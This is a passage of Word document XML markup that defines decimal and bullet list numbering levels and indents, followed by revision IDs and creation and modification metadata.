    <w:nsid w:val="196918FF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6204CBA0"/>
    <w:lvl w:ilvl="0" w:tplc="6532BEA0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="7564E3F2">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="58868DD6">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="F10E385E">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="C644BAC4">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="8DC2CBDA">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="EC32CF9E">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="5D56FEE2">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="C3669454">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="5E79053D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="334C6700"/>
    <w:lvl w:ilvl="0" w:tplc="DCB45E04">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="421E0872">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="74764AAC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="1332A95C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="ACE2FCB6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="685C1268">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="95928602">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="64685622">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="EC10B02C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="72724396"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="132CEEE8"/>
    <w:lvl w:ilvl="0" w:tplc="BFEE854E">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="9B28C64C">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="CB843D20">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="731A2EC2">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="570493E8">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="B136DDC0">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="A57E4DD8">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="BD807CAE">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="8F728000">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="7F721CC8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BA20E70E"/>
    <w:lvl w:ilvl="0" w:tplc="A45257BA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="E5A8FBF6">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="D834DA30">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="E648F060">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="1228F3B2">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="781C6AEC">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="6704987E">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="B42A1E0E">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="8A623970">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5"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="1"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="4"/>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668"/>
    <w:rsid w:val="00174668"/>
    <w:rsid w:val="00203CB1"/>
    <w:rsid w:val="002708A8"/>
    <w:rsid w:val="003467B4"/>
    <w:rsid w:val="005A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AE96"/>
  <w15:docId w15:val="{D0155B3E-81B1-4BFE-9134-C321132C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4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-10-12T11:38:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-10-12T11:43:00Z</dcterms:modified>
</cp:coreProperties>
</file>